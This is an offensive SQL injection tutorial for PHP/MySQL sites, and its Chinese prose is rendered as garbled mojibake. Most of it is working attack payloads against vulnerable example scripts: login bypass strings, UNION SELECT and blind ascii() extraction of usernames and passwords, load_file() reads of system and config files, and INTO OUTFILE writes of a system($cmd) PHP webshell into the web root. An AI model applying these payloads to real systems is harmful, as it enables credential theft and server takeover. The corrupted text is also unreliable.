Php+Mysql×¢ÈëרÌâ
Php×¢Èë¹¥»÷ÊÇÏÖ½ñ×îÁ÷ÐеĹ¥»÷·½Ê½£¬ÒÀ¿¿ËüÇ¿´óµÄÁé»îÐÔÎüÒýÁ˹ã´óºÚÃÔ¡£ ÔÚÉÏÒ»ÆÚµÄ¡¶php°²È«Óë×¢ÉäרÌâ¡·ÖÐÁÖ.linxÖ÷Òª½²ÊöÁËphp³ÌÐòµÄ¸÷ÖÖ©¶´£¬Ò²½²µ½ÁËphp£«mysql×¢ÈëµÄÎÊÌ⣬¿ÉÊǽ²µÄ×¢ÈëµÄÎÊÌâ±È½ÏÉÙ£¬ÈÃÎÒÃǸоõûÓо¡ÐËÊǰÉ. ÔĶÁ´ËÎÄÄãÖ»ÒªÃ÷°×ÏÂÃæµÄÕâµã¶«Î÷¾Í¹»ÁË¡£ 1.Ã÷°×php+mysql»·¾³ÊÇÈçºÎ´î½¨µÄ£¬ÔÚ¹âÅÌÖÐÎÒÃÇÊÕ¼´î½¨µÄÏà¹ØÎÄÕ£¬Èç¹ûÄú¶Ô´î½¨php+mysql»·¾³²»ÊǺÜÇå³þ£¬ÇëÏȲéÔÄ´ËÎÄ£¬ÔÚÉÏÒ»ÆÚµÄרÌâÖÐÒ²ÓÐËù½éÉÜ¡£ ÎÒÃÇÏÈÀ´¿´¿´magic_quotes_gpc£½OffµÄʱºòÎÒÃÇÄܸÉЩɶ£¬È»ºóÎÒÃÇÔÙÏë°ì·¨¸ãÒ»¸ãmagic_quotes_gpc£½OnµÄÇé¿ö¹þ Ò»£ºmagic_quotes_gpc£½OffʱµÄ×¢Èë¹¥»÷ ÏÂÃæÎÒÃǽ«´ÓÓï·¨£¬×¢Èëµã and ×¢ÈëÀàÐͼ¸¸ö·½ÃæÀ´Ïêϸ½²½âmysql£«php×¢Èë A:´ÓMYSQLÓï·¨·½ÃæÏÈ mysql> select 'a'; <form method=¡°POST¡± action=¡°<? echo $PHP_SELF; ?>¡°>
<input type=¡°text¡± name=¡°search¡±><br> <input type=¡°submit¡± value=¡°Search¡±> </form> <?php ¡¡¡ SELECT * FROM users WHERE username LIKE ¡®%$search%¡¯ ORDER BY username ¡¡. ?> ÕâÀïÎÒÃÇ˳±ã˵һÏÂmysqlÖеÄͨÅä·û£¬¡¯%¡¯¾ÍÊÇͨÅä·û£¬ÆäËüµÄͨÅä·û»¹ÓС¯*¡¯ºÍ¡¯_¡¯,ÆäÖÐ" * "ÓÃÀ´Æ¥Åä×Ö¶ÎÃû£¬¶ø" % "ÓÃÀ´Æ¥Åä×Ö¶ÎÖµ£¬×¢ÒâµÄÊÇ%±ØÐëÓëlikeÒ»ÆðÊÊÓ㬻¹ÓÐÒ»¸öͨÅä·û£¬¾ÍÊÇÏ»®Ïß" _ "£¬Ëü´ú±íµÄÒâ˼ºÍÉÏÃæ²»Í¬£¬ÊÇÓÃÀ´Æ¥ÅäÈκε¥¸öµÄ×Ö·ûµÄ¡£ÔÚÉÏÃæµÄ´úÂëÖÐÎÒÃÇÓõ½ÁË¡¯*¡¯±íʾ·µ»ØµÄËùÓÐ×Ö¶ÎÃû£¬%$search%±íʾËùÓаüº¬$search×Ö·ûµÄÄÚÈÝ¡£ ÎÒÃÇÈçºÎ×¢ÈëÁ¨£¿ °ÑÌá½»µÄÄÚÈÝ´øÈëµ½sqlÓï¾äÖгÉΪ SELECT * FROM users WHERE username LIKE ¡®%aabb%¡¯ or 1=1 order by id# ORDER BY username
¼ÙÈçûÓк¬ÓÐaabbµÄÓû§Ãû£¬ÄÇôor 1£½1ʹ·µ»ØÖµÈÔÎªÕæ£¬Ê¹ÄÜ·µ»ØËùÓÐÖµ ÎÒÃÇ»¹¿ÉÒÔÕâÑù ÔÚ±íµ¥ÀïÌá½» SELECT * FROM users WHERE username LIKE ¡®% %¡¯ order by id# ORDER BY username
ºÍ SELECT * FROM users WHERE username LIKE ¡®%%¡¯ order by id# ORDER BY username
µ±È»ÁË£¬ÄÚÈÝÈ«²¿·µ»Ø¡£ CREATE TABLE users (
id int(10) NOT NULL auto_increment, login varchar(25), password varchar(25), email varchar(30), userlevel tinyint, PRIMARY KEY (id) ) ÆäÖÐuserlevel±íʾµÈ¼¶£¬1Ϊ¹ÜÀíÔ±£¬2ΪÆÕͨÓû§ <?php
//change.php ¡¡ $sql = "UPDATE users SET password='$pass', email='$email' WHERE id='$id'" ¡¡ ?> Ok£¬ÎÒÃÇ¿ªÊ¼×¢ÈëÁËŶ£¬ÔÚÌíemailµÄµØ·½ÎÒÃÇÌíÈë netsh@163.com¡¯,userlevel=¡¯1
sqlÓï¾äÖ´ÐеľÍÊÇ ¿´¿´ÎÒÃǵÄuserlevel¾ÍÊÇ1ÁË£¬±ä³É¹ÜÀíÔ±ÁËÓ´ 3)ÏÂÃæÂÖµ½insertÁË£¬ËüÒѾµÈµÄ²»ÄÍ·³ÁË£¬¼òÖ±¾ÍÏñÖÐÎçʳÌÃÀïµÄѧÉúÃÇ¡£ INSERT [LOW_PRIORITY | DELAYED] [IGNORE]
[INTO] tbl_name [(col_name,...)] VALUES (expression,...),(...),... INSERT°ÑÐÂÐвåÈëµ½Ò»¸ö´æÔڵıíÖУ¬INSERT ... VALUESÐÎʽµÄÓï¾ä»ùÓÚÃ÷È·Ö¸¶¨µÄÖµ²åÈëÐУ¬INSERT ... SELECTÐÎʽ²åÈë´ÓÆäËû±íÑ¡ÔñµÄÐУ¬Óжà¸öÖµ±íµÄINSERT ... VALUESµÄÐÎʽÔÚMySQL 3.22.5»òÒÔºó°æ±¾ÖÐÖ§³Ö£¬col_name=expressionÓï·¨ÔÚMySQL 3.22.10»òÒÔºó°æ±¾ÖÐÖ§³Ö¡£ ¿´¿´±íµÄ½á¹¹ÏÈ CREATE TABLE membres (
id varchar(15) NOT NULL default '', login varchar(25), password varchar(25), email varchar(30), userlevel tinyint, PRIMARY KEY (id) ) ÎÒÃÇÈÔÈ»¼ÙÉèuserlevel±íʾÓû§µÈ¼¶£¬1Ϊ¹ÜÀíÕߣ¬2ΪÆÕͨÓû§¹þ¡£ <?php
//reg.php ¡¡ $query = "INSERT INTO members VALUES('$id','$login','$pass','$email',¡¯2')" ; ¡¡ ?> ĬÈϲåÈëÓû§µÈ¼¶ÊÇ2 netsh@163.com¡¯,¡¯1¡¯)#
sqlÓï¾äÖ´ÐÐʱ±ä³ÉÁË£º INSERT INTO membres VALUES ('youid','youname','youpass',' netsh@163.com¡¯,¡¯1¡¯)#',?')
¿´ÎÒÃÇÒ»×¢²á¾ÍÊǹÜÀíÔ±ÁË¡£ 2.ÏÂÃæËµÒ»ËµmysqlÖеÄ×¢ÊÍ£¬Õâ¸öÊǺÜÖØÒªµÄ£¬´ó¼Ò¿É²»ÄÜÔÙ˯¾õÀ²£¬ÒªÊÇÔÙ˯¾õµ½ÆÚÄ©¿¼ÊÔµÄʱºò¾Í¹ÒÁËÄãÃÇ¡£ ¶ÔÓÚ#ºÅ½«ÊÇÎÒÃÇ×î³£ÓõÄ×¢ÊÍ·½·¨¡£ ×¢Ò⣺ÔÚä¯ÀÀÆ÷µØÖ·À¸ÊäÈë#ʱӦ°ÑËüд³É%23£¬ÕâÑù¾urlencodeת»»ºó²ÅÄܳÉΪ#£¬´Ó¶øÆðµ½×¢Ê͵Ä×÷Óá£#ºÅÔÚä¯ÀÀÆ÷µÄµØÖ·¿òÖÐÊäÈëµÄ»°¿ÉʲôҲ²»ÊÇŶ¡£ ÓÐÈçϵĹÜÀíÔ±ÐÅÏ¢±í CREATE TABLE alphaauthor (
Id tinyint(4) NOT NULL auto_increment, UserName varchar(50) NOT NULL default '', PASSWORD varchar(50) default NULL, Name varchar(50) default NULL, PRIMARY KEY (Id), UNIQUE KEY Id (Id), KEY Id_2 (Id) ) <?php
//Login.php ¡¡ $query="select * from alphaauthor where UserName='$username' and Password='$passwd'"; $result=mysql_query($query); $data=mysql_fetch_array($result); if ($data) { Echo ¡°ÖØÒªÐÅÏ¢¡±; } Else Echo ¡°µÇ½ʧ°Ü¡±; ¡¡ ?> ÎÒÃÇÔÚä¯ÀÀÆ÷µØÖ·¿òÖ±½ÓÊäÈë http://***/login.php?username=a¡¯or id=1 %23
%23ת»»³É#ÁË select * from alphaauthor where UserName='a¡¯or id=1 #' and Password='$passwd'
#ºÅºóÃæµÄ¶¼°ÝÊäÈëÁË£¬¿´¿´ select * from alphaauthor where UserName='a¡¯or id=1
ÔÙ×Ðϸ¿´¿´±íµÄ½á¹¹£¬Ö»ÒªÓÐid=1µÄÕË»§£¬·µ»ØµÄ$data¾ÍÓ¦¸ÃÎªÕæ hppt://***/login.php?username=a¡¯or 1£½1 %23
Ò»ÑùµÄÀ² 3.ÏÂÃæ½«Òª³ö³¡µÄÊÇ¡¡ VERSION() ·µ»ØÊý¾Ý¿â°æ±¾ÐÅÏ¢ ÓÐʱºòºÜÓÐÓõÄŶ£¬±ÈÈç˵Äã¿ÉÒÔ¸ù¾ÝËûµÄmysql°æ±¾¿´¿´ËûµÄmysqlÓÐûÓÐʲôÒç³ö©¶´£¬Ã»×¼ÎÒÃǾͷ¢ÏÖ¸öºÃ¶¯¶«¹þ¹þ 4. ÏÂÃæ½øÈë×îÖØÒªµÄ²¿·ÖÁË£¬Ã»Ë¯¾õµÄ´òÆð¾«ÉñÀ´£¬Ë¯×ÅÁ˵ÄÐÑÒ»ÐÑÀ²¡£ ÔÚ SELECT ÖÐµÄ select_expression ²¿·ÖÁгöµÄÁбØÐë¾ßÓÐͬÑùµÄÀàÐÍ¡£µÚÒ»¸ö SELECT ²éѯÖÐʹÓõÄÁÐÃû½«×÷Ϊ½á¹û¼¯µÄÁÐÃû·µ»Ø¡£ ÐèҪעÒâµÄÊÇunionǰºóµÄselect×Ö¶ÎÊýÏàͬ£¬Ö»ÓÐÕâÑùunionº¯Êý²ÅÄÜ·¢»Ó×÷Óá£Èç¹û×Ö¶ÎÊý²»µÈ½«·µ»Ø ERROR 1222 (21000): The used SELECT statements have a different number of columns ´íÎó
Ôο©£¬ÕâÑù²»ºÃ°É¡£Õ¦°ëÁ¨£¿ mysql> select * from alphadb where id=351 union select 1,2,3,4,5,6,7,8,9,10 from alphaauthor;
Èçͼ£¨2£© ÎÒÃÇÖ»slectÁË10¸öÊýµ±È»³ö´íÀ²¡£ mysql> select * from alphadb where id=347 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor;
Èçͼ£¨3£© ÎÒÃÇ¿´¿´id£½247ÖеÄÊý¾ÝÏÈ mysql> select * from alphadb where id=347 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor;
ÊÇÏàͬµÄ¡£ mysql> select * from alphadb where id=347 and 1<>1 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor;
Èçͼ£¨4£© ÎÒÃÇ·¢ÏÖËü°ÑÎÒÃǺóÃæµÄ1,2,3,4,5,6,7,8,9,10,11¸³¸øÁ˸÷¸ö×Ö¶ÎÀ´ÏÔʾ¡£ http://localhost/site/display.php?id=347 and 1<>1 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor
½á¹ûÈçͼ6 ÏÂÃæÎÒÃÇÓÃÒ»·ùͼÀ´×ܽáÒ»ÏÂunionµÄÓ÷¨Èçͼ7 Ok£¬ÖªµÀÔõôÀûÓÃÁ˲»£¿²»ÖªµÀµÄ»°ÏÂÃæ½«»áÏêϸ¸æËßÄã¡£ mysql> select load_file('c:/boot.ini');
Ч¹ûÈçͼ£¨8£© ¿ÉÊÇÎÒÃÇÔÚÍøÒ³ÖÐÔõô¸ãÄØ£¿ http://localhost/site/display.php?id=347%20and%201<>1%20union%20select%201,2,load_file('c:/apache/htdocs/site/lib/sql.inc'),4,5,6,7,8,9,10,11
ÕâÀïµÄc:/apache/htdocs/site/lib/sql.inc²¢²»ÊÇÎÒµÄÅäÖÃÎļþŶ£¬£ºP ¿´¿´£¬ÎļþÄÚÈݱ©Â¶ÎÞÒÉ¡£ # CREATE TABLE test ( # INSERT INTO test VALUES ('<?php system($cmd); ?>', NULL);
ÒÑÖªÎÒµÄÍøÕ¾Â·¾¶ÔÚC:/apache/htdocs/site/ http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,a,4,5,6,7,8,9,10,11%20from%20test%20into%20outfile%20'C:/apache/htdocs/site/cmd.php'
Òâ˼¾ÍÊǰѱíÀïµÄaÁÐÄÚÈݵ¼³öµ½cmd.phpzhong 1 2 <?php system($cmd); ?> 0000-00-00 00:00:00 5 6 7 8 9 10 11
ÎÒÃÇÖ´ÐÐһϿ´¿´ÏÈ Èçͼ(10)
LOAD DATA [LOW_PRIORITY] [LOCAL] INFILE 'file_name.txt' [REPLACE | IGNORE] INTO TABLE tbl_name
LOAD DATA INFILEÓï¾ä´ÓÒ»¸öÎı¾ÎļþÖÐÒԺܸߵÄËٶȶÁÈëÒ»¸ö±íÖС£ ÕâÀï¾Ù¸öÀý×ÓÀ´ËµËµ # CREATE TABLE test (
Mysql>load data infile 'c:/cmd.php' into table test
ÆäÖÐc:/cmd.phpÄÚÈÝΪ <?php system($cmd); ?>
×¢Ò⣺ÉÏÃæµÄÄÚÈÝдÔÚÒ»ÐÐÀïŶ¡£ ʵ¼ÊÉϵõ½µÄ¾ÍÊÇÉϸöÀý×Ótest±íÖеÄÄÚÈÝ£¡¿´¿´£¬ÔÙ½áºÏinto outfile£¬ÊDz»ÊÇÒ»¸öÍêÃÀµÄ×éºÏÄØ¡£ B:´Ó×¢È뷽ʽÉÏ http://localhost/site/display.php?id=451%20and%201=(select%20min(id)%20from%20alphaauthor)
ÅжÏÊÇ·ñ´æÔÚalphaauthor£¬Èç¹ûÓзµ»ØÕý³£Ò³Ã棨һ°ãÇé¿öÀ²£¬ÓеÄʱºòÒ²·µ»ØÆäËüʲôµÄ£¬ÕâÖ÷Òª¸ù¾Ý¹¹Ôì1£½1 ºÍ1£½2ʱµÄÒ³ÃæÅжϣ© http://localhost/site/display.php?id=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20length(username)=5)
ÅжÏÊÇ·ñusername×ֶεij¤¶ÈΪ5 http://localhost/site/display.php?id=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20length(username)=5%20and%20length(password)=32)
¸úÉÏÃæ²î²»¶àÀ²£¬ÅжÏpassword×ֶεij¤¶È ÏÂÃæ½øÈë²ÂÃÜÂëµÄ½×¶Î£¬ÓÃascii·½·¨À´Ò»Î»Ò»Î»²Â²â°É¡£AsciiµÈͬÓÚaspϵÄasc£¬¹þ¹þ£¬¾³£¿´ºÚ¿ÍXµµ°¸µÄÒ»¶¨ºÜÇå³þÀ²¡£ http://localhost/site/display.php?id=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20ascii(mid(username,1,1))=97)
Óû§ÃûµÚһλŶascii97¾ÍÊÇ×Ö·ûaÀ² http://localhost/site/display.php?id=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20ascii(mid(username,2,1))=108)
µÚ¶þλÀ²£¬ÕâÀïÖ»·ÅÕâÒ»¸öͼÀ²£¬Èçͼ£¨12£©
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,username,password,4,5,6,7,8,9,10,11%20from%20alphaauthor
Èçͼ£¨13£© Õ˺ÅÊÇalpha£¬ÃÜÂëÊÇÒ»³¤´®µÄ¶«¶«£¬¹þ¹þ£¬¼òµ¥Ã÷ÁË£¬¿´µ½Ã»ÓУ¬ÕâÀïÏÔʾ³öÁËunion selectµÄÇ¿´óÍþÁ¦Á˰ɡ£ ÉÏÃæ½²µÄÊÇÔÚ²»Í¨µÄ±íÀïÃæ²Â²âÄÚÈÝ£¬Èç¹ûÔÚͬһ¸ö±íÀïÃæÎÒÃÇ»¹¿ÉÒÔÏñÏÂÃæÕâÑùÁ¨£º <?php
//user.php ¡¡¡.. $sql = "SELECT * FROM user WHERE id=$id"; ¡¡¡¡ if (!$result) { echo "wrong"; exit; } else echo "Óû§ÐÅÏ¢"; ?> ²Â²â·½·¨ºÍÉÏÃæ¼¸ºõÊÇÒ»ÑùµÄ£¬¾ÍÊÇÎÒÃDz»ÓÃÔÙÓÃselectÁË¡£ http://localhost/user.php?id=1 and length(password)=7
ÏÔʾÓû§ÐÅϢ˵Ã÷ÎÒÃDzµÄÕýÈ·£¬ºÇºÇ£¬comeon http://localhost/user.php?id=1 and ascii(mid(password,1,1))=97
µÚһλÃÜÂë http://localhost/user.php?id=1 and ascii(mid(password,2,1))=97
µÚ¶þλŶ£¬ ͨ¹ýÕâÖÖ·½·¨×îÖÕÎÒÃÇÒ²¿ÉÒԵóöid=1µÄÓû§µÄÕ˺ÅÃÜÂë 2. ÏÂÃæÎÒÃÇÀ´¿´¿´×Ö·ûÐ͵Ä×¢È뷽ʽ ÀýÈ磺 <?php
//display.php ¡¡ $query="select * from alphadb where id=¡¯¡±.$id.¡±¡¯"; ¡¡¡¡.. ?> ÕâÑùid¾Í±ä³É×Ö·ûÐ͵ÄÁË¡£ http://localhost/site/display.php?id=451' and 1=1 and ¡®¡¯=¡¯
http://localhost/site/display.php?id=451' and 1=2 and ¡®¡¯=¡¯ ´øÈëµ½sqlÓï¾äÀï¾ÍÊÇ select * from alphadb where id=¡¯451¡¯and 1=1 and ¡®¡¯=¡¯¡¯
select * from alphadb where id=¡¯451¡¯and 1=2 and ¡®¡¯=¡¯¡¯ Èç¹ûÄã·¢ÏÖÒ³ÃæÐÅÏ¢²»Í¬µÄ»°ËµÃ÷©¶´´æÔÚŶ http://localhost/site/display.php?id=451' and 1=1 %23
http://localhost/site/display.php?id=451' and 1=2 %23 %23ת»¯ÒÔºó¾ÍÊÇ#£¬¼´×¢Ê͵ÄÒâ˼£¬ÉÏÃæËµ¹ýÁËŶ select * from alphadb where id=¡¯451¡¯and 1=1 #¡¯
ÕýÊÇÎÒÃÇÏëÒªµÄŶ£¡ http://localhost/site/display.php?id=451' and 1=1 %23
ͼ£¨14£© Õý³£ÏÔʾÁËß½£¡ http://localhost/site/display.php?id=451' and 1=2 %23
ͼ£¨15£©
http://localhost/site/display.php?id=451¡¯%20and%201=2%20%20union%20select%201,username,password,4,5,6,7,8,9,10,11%20from%20alphaauthor%23
¿´Í¼£¨16£© Ok,Óû§ÃûºÍÃÜÂëÓÖ³öÀ´ÁËŶ£¡ <?php
//search.php ¡¡ $query="select * from alphadb where title like '%$title%'; ¡¡¡¡.. ?> ²»ÖªµÀ´ó¼Ò»¹ÊÇ·ñ¼ÇµÃaspÀïµÄ×¢ÈëÄØ£¿ a%' and 1=2 union select 1,username,3,4,5,6,7,8, password,10,11 from alphaauthor#
¡¡¡¡·Åµ½sqlÓï¾äÖгÉÁË select * from alphadb where title like '%a%' and 1=2 union select 1,username,3,4,5,6,7,8, password,10,11 from alphaauthor# %'
½á¹ûÈçͼ17Ŷ ÔõôÑù£¬³öÀ´Á˰ɣ¬¹þ¹þ£¬Ò»Çо¡ÔÚÕÆÎÕÖ®ÖС£ C£ºÏÂÃæÎÒÃÇ´Ó×¢ÈëµØµãÉÏÔÚÀ´¿´Ò»Ï¸÷ÖÖ×¢Èë¹¥»÷·½Ê½ <?php
//login.php ¡¡. $query="select * from alphaauthor where UserName='" .$HTTP_POST_VARS["UserName"]."' and Password='". $HTTP_POST_VARS["Password"]."'"; $result=mysql_query($query); $data=mysql_fetch_array($result); if ($data) { echo ¡°ºǫ́µÇ½³É¹¦¡±; } esle { echo ¡°ÖØÐµÇ½¡±£» exit£» £ý ¡¡¡ ?> UsernameºÍpasswordûÓо¹ýÈκδ¦ÀíÖ±½Ó·Åµ½sqlÖÐÖ´ÐÐÁË¡£ ¡®or¡¯¡¯=¡¯
´øÈësqlÓï¾äÖгÉÁË select * from alphaauthor where UserName=¡¯¡¯or¡¯¡¯=¡¯¡¯ and Password=¡¯¡¯or¡¯¡¯=¡¯¡¯
ÕâÑù´øÈëµÃµ½µÄ$data¿Ï¶¨ÎªÕ棬Ҳ¾ÍÊÇÎÒÃdzɹ¦µÇ½ÁË¡£ select * from alphaauthor where UserName=¡¯¡¯or¡¯a¡¯=¡¯a¡¯ and Password=¡¯¡¯or¡¯a¡¯=¡¯a¡¯
2. select * from alphaauthor where UserName=¡¯ ¡¯or 1=1 and ¡®¡¯=¡¯¡¯ and Password=¡¯ ¡¯or 1=1 and ¡®¡¯=¡¯¡¯
Óû§ÃûºÍÃÜÂë¶¼ÊäÈ롯or 2>1 and ¡®¡¯=¡¯ select * from alphaauthor where UserName=¡¯ ¡¯or 2>1 and ¡®¡¯=¡¯¡¯ and Password=¡¯ ¡¯or 2>1 and ¡®¡¯=¡¯¡¯
3. select * from alphaauthor where UserName=¡¯ ¡¯or 1£½1 # and Password=¡¯anything¡¯
ºóÃæ²¿·Ö±»×¢Ê͵ôÁË£¬µ±È»·µ»Ø»¹ÊÇտŶ¡£ Óû§ÃûÊäÈ롯or id£½1 # ÃÜÂëËæ±ãÊäÈë select * from alphaauthor where UserName=¡¯ ¡¯or id£½1 # and Password=¡¯anything¡¯
Èçͼ18 ¿´¿´Ð§¹ûͼ19
Ë×»°ËµµÄºÃ£¬Ö»ÓÐÏë²»µ½Ã»ÓÐ×ö²»µ½¡£ 2£©µÚ¶þ¸ö³£ÓÃ×¢ÈëµÄµØ·½Ó¦¸ÃËãÊÇǰ̨×ÊÁÏÏÔʾµÄµØ·½ÁË¡£ http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20dl_users
Èçͼ20 ¿´¿´£¬ÎÒÃÇÓֵõ½ÎÒÃÇÏëÒªµÄÁË <?php
//login.php ¡¡ $query="select * from ".$art_system_db_table['user']." where UserName=$username and Password='".$Pw."'"; ¡¡ ?> ¼ÙÉèÎÒÃÇÖªµÀºǫ́µÄÓû§ÃûÊÇalpha http://localhost/site/admin/login.php?username=char(97,108,112,104,97)%23
sqlÓï¾ä±ä³É£º select * from alphaAuthor where UserName=char(97,108,112,104,97)# and Password=''
Èçͼ21 ÕýÈçÎÒÃÇÆÚÍûµÄÄÇÑù£¬Ëû˳ÀûÖ´ÐÐÁË£¬ÎÒÃǵõ½ÎÒÃÇÏëÒªµÄ¡£ sqlÓï¾ä±ä³É£º select * from alphaAuthor where UserName=0x616C706861%23# and Password=''
ÎÒÃÇÔÙÒ»´ÎÊdzɹ¦ÕßÁË¡£ºÜÓгɾ͸аɣ¬ »òÐíÄã»áÎÊÎÒÃÇÊÇ·ñ¿ÉÒÔ°Ñ#Ò²·ÅÔÚchar()Àï mysql> select * from dl_users where username=alpha;
ERROR 1054 (42S22): Unknown column 'alpha' in 'where clause' ¿´·µ»Ø´íÎóÁË¡£ÒòΪËû»áÈÏΪalphaÊÇÒ»¸ö±äÁ¿¡£ËùÒÔÎÒÃǵÃÔÚalphaÉϼÓÒýºÅ¡£ mysql> select * from dl_users where username='alpha';
ÕâÑù²ÅÊÇÕýÈ·µÄ¡£ select * from dl_users where username='alpha#';
µ±È»ÊÇʲôҲûÓÐÁË£¬ÒòΪÁ¬alpha#Õâ¸öÓû§¶¼Ã»ÓС£ <?php
//display.php ¡¡ $query="select * from ".$art_system_db_table['article']." where type=$type; ¡¡ ?> ´úÂë¸ù¾ÝÀàÐÍÀ´ÏÔʾÄÚÈÝ£¬$typeûÓÐÈκιýÂË£¬ÇÒûÓмÓÒýºÅ·ÅÈë³ÌÐòÖС£ char(120,105,97,111,104,117,97)
ÎÒÃǹ¹½¨ http://localhost/display.php?type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor
´øÈësqlÓï¾äÖÐΪ£º select * from ".$art_system_db_table['article']."
where type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor ¿´¿´£¬ÎÒÃǵÄÓû§ÃûºÍÃÜÂëÕÕÑù³öÀ´ÁËŶ£¡Ã»ÓнØÍ¼£¬ÏëÏñһϿ©£ºP 2) »òÐíÓÐÈË»áÎÊ£¬ÔÚmagic_quotes_gpc£½OnµÄÇé¿öϹ¦ÄÜÇ¿´óµÄload_file()»¹Äܲ»ÄÜÓÃÄØ£¿ load_file(char(99,58,47,98,111,111,116,46,105,110,105))
ͼ22 ·Åµ½¾ßÌå×¢ÈëÀï¾ÍÊÇ http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,load_file(char(99,58,47,98,111,111,116,46,105,110,105)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
¿´Í¼23 ¿´¿´£¬ÎÒÃÇ¿´µ½ÁËboot.iniµÄÄÚÈÝÁËŶ¡£ http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
ͼ24 ¿´¿´Èí¼þÃèÊöÀïд×Å3£¬×÷ÕßÀïд×Å4£¬ÎÒÃǾͿÉÒԲ²â3ºÍ4µÄλÖÃÊÇ×Ö·ûÐ͵ģ¬ÎÒÃÇÔÙ¿´14Ç°ÃæµÄÊÇÏÂÔØ´ÎÊý£¬Õâ¾ÍÓ¦¸ÃÊÇintÐ͵ÄÁË£¬¶Ô°É¡£ http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20dl_users
Èçͼ25 ¹þ¹þ£¬ÕâÖÖ·½·¨Ö»Òª¿´¿´¾Í¿ÉÒÔ´ó¸Å²Âµ½ÁË¡£ 0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870
ÎÒÃǹ¹ÔìÈçÏ http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870),4,5,6,7,8,9,10,11
Èçͼ26 ·¢ÏÖÔÚÎÄÕÂÄÚÈݵĵط½±¾À´¸ÃÏÔʾsql.inc.phpµÄ£¬¿ÉÊÇÈ´¿Õ¿ÕÖ®£¬ÎªºÎÄØ£¿ ¹þ¹þ£¬¿´¿´±ê¼ÇµÄµØ·½£¬ÔÎËÀ£¬ÔÀ´ÔÚÕâÀï°¡£¬¿ÉÊÇΪʲôÁ¨£¿ <?php
//login.php ¡¡ $query="select * from alphaauthor where UserName=md5($username) and Password='".$Pw."'"; ¡¡ ?> ÎÒÃÇÖ±½ÓÔÚä¯ÀÀÆ÷Ìá½» http://localhost/admin/login.php?username=char(97,98)) or 1=1 %23
´øÈësqlÓï¾ä³ÉΪ select * from alphaauthor where UserName=md5(char(97,98)) or 1=1 #) and Password='".$Pw."'
¼ÇµÃmd5ÀïÃæ·ÅµÄÊÇ×Ö·û£¬ÒòΪºóÃæÓÐor 1=2£¬ËùÒÔÎÒÃÇËæ±ã·ÅÁ˸öchar(97,98). Ok£¬µÇ½³É¹¦ÁËŶ£¡¿´¿´£¬md5ÔÚÎÒÃÇÃæÇ°Ò²Ã»ÓÐʲôÓô¦¡£ http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file('C:/apache/htdocs/site/upload/2004091201.jpg'),4,5,6,7,8,9,10,11%20into%20outfile'C:/apache/htdocs/site/shell.php'
ÒòΪÊÊÓÃÁËoutfile£¬ËùÒÔÍøÒ³ÏÔʾ²»Õý³££¬µ«ÊÇÎÒÃǵÄÈÎÎñÊÇÍê³ÉÁË¡£ ˬ·ñ£¿WebshellÎÒÃÇÒѾ´´½¨³É¹¦ÁË¡£¿´µ½×îÇ°ÃæµÄ12ÁËû£¿ÄǾÍÊÇÎÒÃÇselect 1£¬2ËùÊä³öµÄ£¡ http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870),4,5,6,7,8,9,10,11
µÃµ½sql.inc.phpÄÚÈÝΪ <?$connect=@mysql_connect("localhost","root","") or die("Unable to connect to SQL server");mysql_select_db("alpha",$connect) or die("Unable to select database");?>
ºÃÁËÎÒÃÇÖªµÀÁËmysqlµÄrootÃÜÂëÁË£¬ÎÒÃÇÕÒµ½phpmyadminµÄºǫ́ # # SELECT * FROM `te` into outfile 'C:/apache/htdocs/site/cmd1.php';
Èçͼ31 Ok£¬³É¹¦Ö´ÐУ¬ÎÒÃÇÈ¥http://localhost/site/cmd1.php?cmd=dir¿´¿´Ð§¹ûÈ¥ ºÃˬµÄÒ»¸öwebshellÊǰɣ¡¹þ¹þ£¬ÎÒÒ²ºÜϲ»¶¡£ <?php
//reg.php ¡¡ $query = "INSERT INTO members VALUES('$id','$login','$pass','$email',¡¯2')" ; ¡¡ ?> ÎÒÃÇÔÚemailµÄµØ·½ÊäÈë<?php system($cmd) ?> http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,email,4,5,6,7,8,9,10,11%20from%20user%20where%20id=10%20 into%20outfile'C:/apache/htdocs/site/test.php'
ºÃÁË£¬ÎÒÃÇÓÖÓÐÁËÎÒÃǵÄwenshellÁËŶ¡£ ÆäÖÐalphadb.frm·Å×Ålphadb±íÖеÄÊý¾Ý£¬alphadb.frm·Å×űíµÄ½á¹¹£¬alphadb.myiÖзŵÄÄÚÈÝËæmysqlµÄ°æ±¾²»Í¨»áÓÐËù²»Í¬£¬¾ßÌå¿ÉÒÔ×Ô¼ºÓüÇʱ¾´ò¿ªÀ´Åжϡ£ http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file('yminfo210/user.myd'),4,5,6,7,8,9,10,11
